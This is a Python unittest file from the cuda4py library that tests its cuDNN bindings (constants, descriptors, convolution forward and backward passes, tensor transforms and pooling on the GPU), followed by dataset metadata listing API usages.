""" Copyright (c) 2014, Samsung Electronics Co.,Ltd. All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. The views and conclusions contained in the software and documentation are those of the authors and should not be interpreted as representing official policies, either expressed or implied, of Samsung Electronics Co.,Ltd.. """ """ cuda4py - CUDA cffi bindings and helper classes. URL: https://github.com/ajkxyz/cuda4py Original author: Alexey Kazantsev <[email protected]> """ """ Tests some of the api in cuda4py.cudnn package. """ import cuda4py as cu import cuda4py.cudnn as cudnn import gc import logging import numpy import os import unittest class Test(unittest.TestCase): def setUp(self): logging.basicConfig(level=logging.DEBUG) self.old_env = os.environ.get("CUDA_DEVICE") if self.old_env is None: os.environ["CUDA_DEVICE"] = "0" self.ctx = cu.Devices().create_some_context() self.cudnn = cudnn.CUDNN(self.ctx) self.path = os.path.dirname(__file__) if not len(self.path): self.path = "." def tearDown(self): if self.old_env is None: del os.environ["CUDA_DEVICE"] else: os.environ["CUDA_DEVICE"] = self.old_env del self.old_env del self.cudnn del self.ctx gc.collect() def test_constants(self): self.assertEqual(cudnn.CUDNN_STATUS_SUCCESS, 0) self.assertEqual(cudnn.CUDNN_STATUS_NOT_INITIALIZED, 1) self.assertEqual(cudnn.CUDNN_STATUS_ALLOC_FAILED, 2) self.assertEqual(cudnn.CUDNN_STATUS_BAD_PARAM, 3) self.assertEqual(cudnn.CUDNN_STATUS_INTERNAL_ERROR, 4) self.assertEqual(cudnn.CUDNN_STATUS_INVALID_VALUE, 5) self.assertEqual(cudnn.CUDNN_STATUS_ARCH_MISMATCH, 6) self.assertEqual(cudnn.CUDNN_STATUS_MAPPING_ERROR, 7) self.assertEqual(cudnn.CUDNN_STATUS_EXECUTION_FAILED, 8) self.assertEqual(cudnn.CUDNN_STATUS_NOT_SUPPORTED, 9) self.assertEqual(cudnn.CUDNN_STATUS_LICENSE_ERROR, 10) self.assertEqual(cudnn.CUDNN_DATA_FLOAT, 0) self.assertEqual(cudnn.CUDNN_DATA_DOUBLE, 1) self.assertEqual(cudnn.CUDNN_DATA_HALF, 2) self.assertEqual(cudnn.CUDNN_TENSOR_NCHW, 0) self.assertEqual(cudnn.CUDNN_TENSOR_NHWC, 1) self.assertEqual(cudnn.CUDNN_CONVOLUTION, 0) self.assertEqual(cudnn.CUDNN_CROSS_CORRELATION, 1) self.assertEqual(cudnn.CUDNN_CONVOLUTION_FWD_NO_WORKSPACE, 0) self.assertEqual(cudnn.CUDNN_CONVOLUTION_FWD_PREFER_FASTEST, 1) self.assertEqual( cudnn.CUDNN_CONVOLUTION_FWD_SPECIFY_WORKSPACE_LIMIT, 2) self.assertEqual(cudnn.CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_GEMM, 0) self.assertEqual( cudnn.CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM, 1) self.assertEqual(cudnn.CUDNN_CONVOLUTION_FWD_ALGO_GEMM, 2) self.assertEqual(cudnn.CUDNN_CONVOLUTION_FWD_ALGO_DIRECT, 3) self.assertEqual(cudnn.CUDNN_CONVOLUTION_FWD_ALGO_FFT, 4) self.assertEqual(cudnn.CUDNN_CONVOLUTION_FWD_ALGO_FFT_TILING, 5) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_FILTER_NO_WORKSPACE, 0) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_FILTER_PREFER_FASTEST, 1) self.assertEqual( cudnn.CUDNN_CONVOLUTION_BWD_FILTER_SPECIFY_WORKSPACE_LIMIT, 2) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_FILTER_ALGO_0, 0) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_FILTER_ALGO_1, 1) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_FILTER_ALGO_FFT, 2) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_FILTER_ALGO_3, 3) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_DATA_NO_WORKSPACE, 0) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_DATA_PREFER_FASTEST, 1) self.assertEqual( cudnn.CUDNN_CONVOLUTION_BWD_DATA_SPECIFY_WORKSPACE_LIMIT, 2) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_DATA_ALGO_0, 0) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_DATA_ALGO_1, 1) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT, 2) self.assertEqual(cudnn.CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING, 3) self.assertEqual(cudnn.CUDNN_POOLING_MAX, 0) self.assertEqual(cudnn.CUDNN_POOLING_AVERAGE_COUNT_INCLUDE_PADDING, 1) self.assertEqual(cudnn.CUDNN_POOLING_AVERAGE_COUNT_EXCLUDE_PADDING, 2) def test_errors(self): idx = cu.CU.ERRORS[cudnn.CUDNN_STATUS_NOT_INITIALIZED].find(" | ") self.assertGreater(idx, 0) def test_version(self): logging.debug("CUDNN version is %d", self.cudnn.version) self.assertEqual(self.cudnn.version, int(self.cudnn.version)) def test_tensor_descriptor(self): d = cudnn.TensorDescriptor() self.assertIsNotNone(d.handle) for dt in (cudnn.CUDNN_DATA_DOUBLE, cudnn.CUDNN_DATA_FLOAT): for fmt in (cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_TENSOR_NHWC): d.set_4d(fmt, dt, 100, 50, 217, 215) del d def test_filter_descriptor(self): d = cudnn.FilterDescriptor() self.assertIsNotNone(d.handle) for dt in (cudnn.CUDNN_DATA_DOUBLE, cudnn.CUDNN_DATA_FLOAT): d.set_4d(dt, 64, 3, 11, 12) del d def test_convolution_descriptor(self): d = cudnn.ConvolutionDescriptor() self.assertIsNotNone(d.handle) for mode in (cudnn.CUDNN_CROSS_CORRELATION, cudnn.CUDNN_CONVOLUTION): d.set_2d(1, 2, 3, 4, 1, 1, mode) del d def _init_descriptors(self, include_out=False): conv = cudnn.ConvolutionDescriptor() conv.set_2d(5, 4, 2, 1) inp = cudnn.TensorDescriptor() inp.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, 100, 8, 208, 224) filter = cudnn.FilterDescriptor() filter.set_4d(cudnn.CUDNN_DATA_FLOAT, 64, 8, 11, 7) if not include_out: return conv, inp, filter n, c, h, w = cudnn.CUDNN.get_convolution_2d_forward_output_dim( conv, inp, filter) out = cudnn.TensorDescriptor() out.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, n, c, h, w) return conv, inp, filter, out def test_get_convolution_2d_forward_output_dim(self): conv, inp, filter = self._init_descriptors() n, c, h, w = cudnn.CUDNN.get_convolution_2d_forward_output_dim( conv, inp, filter) self.assertEqual(n, 100) self.assertEqual(c, 64) self.assertEqual(h, 104) self.assertEqual(w, 226) def test_get_convolutional_forward_algorithm(self): logging.debug("ENTER: test_get_convolutional_forward_algorithm") conv, inp, filter, out = self._init_descriptors(True) algo = self.cudnn.get_convolution_forward_algorithm( inp, filter, conv, out) self.assertGreaterEqual(algo, 0) logging.debug("Fastest algo is %d", algo) algo = self.cudnn.get_convolution_forward_algorithm( inp, filter, conv, out, cudnn.CUDNN_CONVOLUTION_FWD_SPECIFY_WORKSPACE_LIMIT, 512 * 1024 * 1024) logging.debug("With 512 Mb limit: %d", algo) logging.debug("EXIT: test_get_convolutional_forward_algorithm") def test_get_convolution_forward_workspace_size(self): logging.debug("ENTER: test_get_convolution_forward_workspace_size") conv, inp, filter, out = self._init_descriptors(True) algo = self.cudnn.get_convolution_forward_algorithm( inp, filter, conv, out) for a in (algo, cudnn.CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_GEMM, cudnn.CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM, cudnn.CUDNN_CONVOLUTION_FWD_ALGO_GEMM, cudnn.CUDNN_CONVOLUTION_FWD_ALGO_DIRECT): try: sz = self.cudnn.get_convolution_forward_workspace_size( inp, filter, conv, out, a) except cu.CUDARuntimeError as e: self.assertEqual(e.code, cudnn.CUDNN_STATUS_NOT_SUPPORTED) continue self.assertGreaterEqual(sz, 0) logging.debug("algo=%d size=%d", a, sz) logging.debug("EXIT: test_get_convolution_forward_workspace_size") def test_convolution_forward(self): logging.debug("ENTER: test_convolution_forward") conv_desc = cudnn.ConvolutionDescriptor() conv_desc.set_2d(5, 4, 2, 1) inp_data = numpy.zeros((100, 8, 104, 112), dtype=numpy.float32) inp_data[:] = 0.1 inp_desc = cudnn.TensorDescriptor() inp_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *inp_data.shape) inp_buf = cu.MemAlloc(self.ctx, inp_data) filter_data = numpy.zeros((64, 8, 11, 7), dtype=numpy.float32) filter_data[:] = 0.3 filter_desc = cudnn.FilterDescriptor() filter_desc.set_4d(cudnn.CUDNN_DATA_FLOAT, *filter_data.shape) filter_buf = cu.MemAlloc(self.ctx, filter_data) n, c, h, w = cudnn.CUDNN.get_convolution_2d_forward_output_dim( conv_desc, inp_desc, filter_desc) out_data = numpy.zeros((n, c, h, w), dtype=numpy.float32) out_desc = cudnn.TensorDescriptor() out_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *out_data.shape) out_buf = cu.MemAlloc(self.ctx, out_data) workspace = cu.MemAlloc(self.ctx, 512 * 1024 * 1024) algo = self.cudnn.get_convolution_forward_algorithm( inp_desc, filter_desc, conv_desc, out_desc, cudnn.CUDNN_CONVOLUTION_FWD_SPECIFY_WORKSPACE_LIMIT, workspace.size) alpha = numpy.ones(1, dtype=numpy.float32) beta = numpy.zeros(1, dtype=numpy.float32) self.cudnn.convolution_forward( alpha, inp_desc, inp_buf, filter_desc, filter_buf, conv_desc, algo, workspace, workspace.size, beta, out_desc, out_buf) out_buf.to_host(out_data) self.assertEqual(numpy.count_nonzero(out_data), out_data.size) logging.debug("EXIT: test_convolution_forward") def test_convolution_backward_bias(self): logging.debug("ENTER: test_convolution_backward_bias") bperr_data = numpy.zeros((100, 64, 104, 226), dtype=numpy.float32) bperr_data[:] = 0.1 bperr_desc = cudnn.TensorDescriptor() bperr_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *bperr_data.shape) bperr_buf = cu.MemAlloc(self.ctx, bperr_data) gd_data = numpy.zeros(64, dtype=numpy.float32) gd_desc = cudnn.TensorDescriptor() gd_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, 1, gd_data.size, 1, 1) gd_buf = cu.MemAlloc(self.ctx, gd_data) alpha = numpy.ones(1, dtype=numpy.float32) beta = numpy.zeros(1, dtype=numpy.float32) self.cudnn.convolution_backward_bias(alpha, bperr_desc, bperr_buf, beta, gd_desc, gd_buf) gd_buf.to_host(gd_data) self.assertEqual(numpy.count_nonzero(gd_data), gd_data.size) logging.debug("EXIT: test_convolution_backward_bias") def test_convolution_backward_filter(self): logging.debug("ENTER: test_convolution_backward_filter") conv_desc = cudnn.ConvolutionDescriptor() conv_desc.set_2d(5, 5, 1, 1) inp_data = numpy.zeros((100, 8, 96, 96), dtype=numpy.float32) inp_data[:] = 0.1 inp_desc = cudnn.TensorDescriptor() inp_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *inp_data.shape) inp_buf = cu.MemAlloc(self.ctx, inp_data) filter_data = numpy.zeros((64, 8, 11, 11), dtype=numpy.float32) filter_data[:] = 0.1 filter_desc = cudnn.FilterDescriptor() filter_desc.set_4d(cudnn.CUDNN_DATA_FLOAT, *filter_data.shape) filter_buf = cu.MemAlloc(self.ctx, filter_data) bperr_data = numpy.zeros((100, 64, 96, 96), dtype=numpy.float32) bperr_data[:] = 0.1 bperr_desc = cudnn.TensorDescriptor() bperr_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *bperr_data.shape) bperr_buf = cu.MemAlloc(self.ctx, bperr_data) gd_data = numpy.zeros_like(filter_data) gd_desc = cudnn.FilterDescriptor() gd_desc.set_4d(cudnn.CUDNN_DATA_FLOAT, *gd_data.shape) gd_buf = cu.MemAlloc(self.ctx, gd_data) alpha = numpy.ones(1, dtype=numpy.float32) beta = numpy.zeros(1, dtype=numpy.float32) self.cudnn.convolution_backward_filter( alpha, inp_desc, inp_buf, bperr_desc, bperr_buf, conv_desc, beta, gd_desc, gd_buf) gd_buf.to_host(gd_data) self.assertEqual(numpy.count_nonzero(gd_data), gd_data.size) if self.cudnn.version >= 4000: algo = self.cudnn.get_convolution_backward_filter_algorithm( inp_desc, bperr_desc, conv_desc, gd_desc) logging.debug("Fastest algo is %d", algo) sz = self.cudnn.get_convolution_backward_filter_workspace_size( inp_desc, bperr_desc, conv_desc, gd_desc, algo) logging.debug("Workspace size for it is %d", sz) algo = self.cudnn.get_convolution_backward_filter_algorithm( inp_desc, bperr_desc, conv_desc, gd_desc, cudnn.CUDNN_CONVOLUTION_BWD_FILTER_SPECIFY_WORKSPACE_LIMIT, 512 * 1024 * 1024) logging.debug("With 512 Mb limit: %d", algo) workspace = cu.MemAlloc(self.ctx, 512 * 1024 * 1024) gd_buf.memset32_async() self.cudnn.convolution_backward_filter( alpha, inp_desc, inp_buf, bperr_desc, bperr_buf, conv_desc, beta, gd_desc, gd_buf, algo, workspace, workspace.size) gd_buf.to_host(gd_data) self.assertEqual(numpy.count_nonzero(gd_data), gd_data.size) logging.debug("EXIT: test_convolution_backward_filter") def test_convolution_backward_data(self): logging.debug("ENTER: test_convolution_backward_data") conv_desc = cudnn.ConvolutionDescriptor() conv_desc.set_2d(5, 5, 1, 1) inp_data = numpy.zeros((100, 8, 96, 96), dtype=numpy.float32) inp_desc = cudnn.TensorDescriptor() inp_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *inp_data.shape) inp_buf = cu.MemAlloc(self.ctx, inp_data) filter_data = numpy.zeros((64, 8, 11, 11), dtype=numpy.float32) filter_data[:] = 0.1 filter_desc = cudnn.FilterDescriptor() filter_desc.set_4d(cudnn.CUDNN_DATA_FLOAT, *filter_data.shape) filter_buf = cu.MemAlloc(self.ctx, filter_data) bperr_data = numpy.zeros((100, 64, 96, 96), dtype=numpy.float32) bperr_data[:] = 0.1 bperr_desc = cudnn.TensorDescriptor() bperr_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *bperr_data.shape) bperr_buf = cu.MemAlloc(self.ctx, bperr_data) alpha = numpy.ones(1, dtype=numpy.float32) beta = numpy.zeros(1, dtype=numpy.float32) self.cudnn.convolution_backward_data( alpha, filter_desc, filter_buf, bperr_desc, bperr_buf, conv_desc, beta, inp_desc, inp_buf) inp_buf.to_host(inp_data) self.assertEqual(numpy.count_nonzero(inp_data), inp_data.size) if self.cudnn.version >= 4000: algo = self.cudnn.get_convolution_backward_data_algorithm( filter_desc, bperr_desc, conv_desc, inp_desc) logging.debug("Fastest algo is %d", algo) sz = self.cudnn.get_convolution_backward_data_workspace_size( filter_desc, bperr_desc, conv_desc, inp_desc, algo) logging.debug("Workspace size for it is %d", sz) algo = self.cudnn.get_convolution_backward_data_algorithm( filter_desc, bperr_desc, conv_desc, inp_desc, cudnn.CUDNN_CONVOLUTION_BWD_DATA_SPECIFY_WORKSPACE_LIMIT, 512 * 1024 * 1024) logging.debug("With 512 Mb limit: %d", algo) workspace = cu.MemAlloc(self.ctx, 512 * 1024 * 1024) inp_buf.memset32_async() self.cudnn.convolution_backward_data( alpha, filter_desc, filter_buf, bperr_desc, bperr_buf, conv_desc, beta, inp_desc, inp_buf, algo, workspace, workspace.size) inp_buf.to_host(inp_data) self.assertEqual(numpy.count_nonzero(inp_data), inp_data.size) logging.debug("EXIT: test_convolution_backward_data") def test_transform_tensor(self): logging.debug("ENTER: test_transform_tensor") sh_interleaved = (2, 5, 5, 3) sh_splitted = (2, 3, 5, 5) inp_data = numpy.arange(numpy.prod(sh_interleaved), dtype=numpy.float32).reshape(sh_interleaved) inp_desc = cudnn.TensorDescriptor() inp_desc.set_4d(cudnn.CUDNN_TENSOR_NHWC, cudnn.CUDNN_DATA_FLOAT, *sh_splitted) inp_buf = cu.MemAlloc(self.ctx, inp_data) out_data = numpy.zeros(sh_splitted, dtype=numpy.float32) out_desc = cudnn.TensorDescriptor() out_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *sh_splitted) out_buf = cu.MemAlloc(self.ctx, out_data) alpha = numpy.ones(1, dtype=numpy.float32) beta = numpy.zeros(1, dtype=numpy.float32) self.cudnn.transform_tensor(alpha, inp_desc, inp_buf, beta, out_desc, out_buf) out_buf.to_host(out_data) max_diff = numpy.fabs(out_data - inp_data.transpose(0, 3, 1, 2)).max() self.assertEqual(max_diff, 0.0) logging.debug("EXIT: test_transform_tensor") def test_pooling(self): logging.debug("ENTER: test_pooling") input_data = numpy.zeros((5, 96, 64, 48), dtype=numpy.float32) input_data[:] = numpy.random.rand(input_data.size).reshape( input_data.shape) - 0.5 input_desc = cudnn.TensorDescriptor() input_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *input_data.shape) input_buf = cu.MemAlloc(self.ctx, input_data) pooling_desc = cudnn.PoolingDescriptor() pooling_desc.set_2d((5, 3), (2, 1), (3, 2)) output_shape = cudnn.CUDNN.get_pooling_2d_forward_output_dim( pooling_desc, input_desc) self.assertEqual(len(output_shape), 4) logging.debug("Output shape is %s", output_shape) output_data = numpy.zeros(output_shape, dtype=numpy.float32) output_data[:] = numpy.nan output_desc = cudnn.TensorDescriptor() output_desc.set_4d(cudnn.CUDNN_TENSOR_NCHW, cudnn.CUDNN_DATA_FLOAT, *output_data.shape) output_buf = cu.MemAlloc(self.ctx, output_data) np_one = numpy.ones(1, dtype=numpy.float32) np_zero = numpy.zeros(1, dtype=numpy.float32) self.cudnn.pooling_forward( pooling_desc, np_one, input_desc, input_buf, np_zero, output_desc, output_buf) output_buf.to_host(output_data) self.assertEqual(numpy.count_nonzero(numpy.isnan(output_data)), 0) diff_desc = output_desc diff_buf = cu.MemAlloc(self.ctx, output_data) grad_desc = input_desc grad_data = input_data.copy() grad_data[:] = numpy.nan grad_buf = cu.MemAlloc(self.ctx, grad_data) self.cudnn.pooling_backward( pooling_desc, np_one, output_desc, output_buf, diff_desc, diff_buf, input_desc, input_buf, np_zero, grad_desc, grad_buf) grad_buf.to_host(grad_data) self.assertEqual(numpy.count_nonzero(numpy.isnan(grad_data)), 0) logging.debug("EXIT: test_pooling") if __name__ == "__main__": logging.basicConfig(level=logging.DEBUG) unittest.main()
null
tests/test_cudnn.py
test_cudnn.py
py
21,419
python
en
code
null
code-starcoder2
83
[ { "api_name": "unittest.TestCase", "line_number": 48, "usage_type": "attribute" }, { "api_name": "logging.basicConfig", "line_number": 50, "usage_type": "call" }, { "api_name": "logging.DEBUG", "line_number": 50, "usage_type": "attribute" }, { "api_name": "os.environ.get", "line_number": 51, "usage_type": "call" }, { "api_name": "os.environ", "line_number": 51, "usage_type": "attribute" }, { "api_name": "os.environ", "line_number": 53, "usage_type": "attribute" }, { "api_name": "cuda4py.Devices", "line_number": 54, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN", "line_number": 55, "usage_type": "call" }, { "api_name": "cuda4py.cudnn", "line_number": 55, "usage_type": "name" }, { "api_name": "os.path.dirname", "line_number": 56, "usage_type": "call" }, { "api_name": "os.path", "line_number": 56, "usage_type": "attribute" }, { "api_name": "os.environ", "line_number": 62, "usage_type": "attribute" }, { "api_name": "os.environ", "line_number": 64, "usage_type": "attribute" }, { "api_name": "gc.collect", "line_number": 68, "usage_type": "call" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_SUCCESS", "line_number": 71, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 71, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_NOT_INITIALIZED", "line_number": 72, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 72, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_ALLOC_FAILED", "line_number": 73, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 73, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_BAD_PARAM", "line_number": 74, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 74, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_INTERNAL_ERROR", "line_number": 75, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 75, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_INVALID_VALUE", "line_number": 76, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 76, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_ARCH_MISMATCH", "line_number": 77, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 77, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_MAPPING_ERROR", "line_number": 78, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 78, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_EXECUTION_FAILED", "line_number": 79, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 79, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_NOT_SUPPORTED", "line_number": 80, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 80, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_STATUS_LICENSE_ERROR", "line_number": 81, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 81, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_FLOAT", "line_number": 83, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 83, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_DOUBLE", "line_number": 84, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 84, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_DATA_HALF", "line_number": 85, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 85, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NCHW", "line_number": 87, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 87, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_TENSOR_NHWC", "line_number": 88, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 88, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION", "line_number": 90, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 90, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CROSS_CORRELATION", "line_number": 91, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 91, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_NO_WORKSPACE", "line_number": 93, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 93, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_PREFER_FASTEST", "line_number": 94, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 94, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_SPECIFY_WORKSPACE_LIMIT", "line_number": 96, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 96, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_GEMM", "line_number": 98, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 98, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_IMPLICIT_PRECOMP_GEMM", "line_number": 100, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 100, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_GEMM", "line_number": 101, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 101, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_DIRECT", "line_number": 102, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 102, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_FFT", "line_number": 103, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 103, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_FWD_ALGO_FFT_TILING", "line_number": 104, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 104, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_FILTER_NO_WORKSPACE", "line_number": 106, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 106, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_FILTER_PREFER_FASTEST", "line_number": 107, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 107, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_FILTER_SPECIFY_WORKSPACE_LIMIT", "line_number": 109, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 109, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_FILTER_ALGO_0", "line_number": 111, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 111, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_FILTER_ALGO_1", "line_number": 112, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 112, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_FILTER_ALGO_FFT", "line_number": 113, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 113, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_FILTER_ALGO_3", "line_number": 114, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 114, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_DATA_NO_WORKSPACE", "line_number": 116, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 116, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_DATA_PREFER_FASTEST", "line_number": 117, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 117, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_DATA_SPECIFY_WORKSPACE_LIMIT", "line_number": 119, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 119, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_DATA_ALGO_0", "line_number": 121, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 121, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_DATA_ALGO_1", "line_number": 122, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 122, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT", "line_number": 123, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 123, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_CONVOLUTION_BWD_DATA_ALGO_FFT_TILING", "line_number": 124, "usage_type": "attribute" }, { "api_name": "cuda4py.cudnn", "line_number": 124, "usage_type": "name" }, { "api_name": "cuda4py.cudnn.CUDNN_POOLING_MAX", "line_number": 126, "usage_type": "attribute" }, { "api_name": 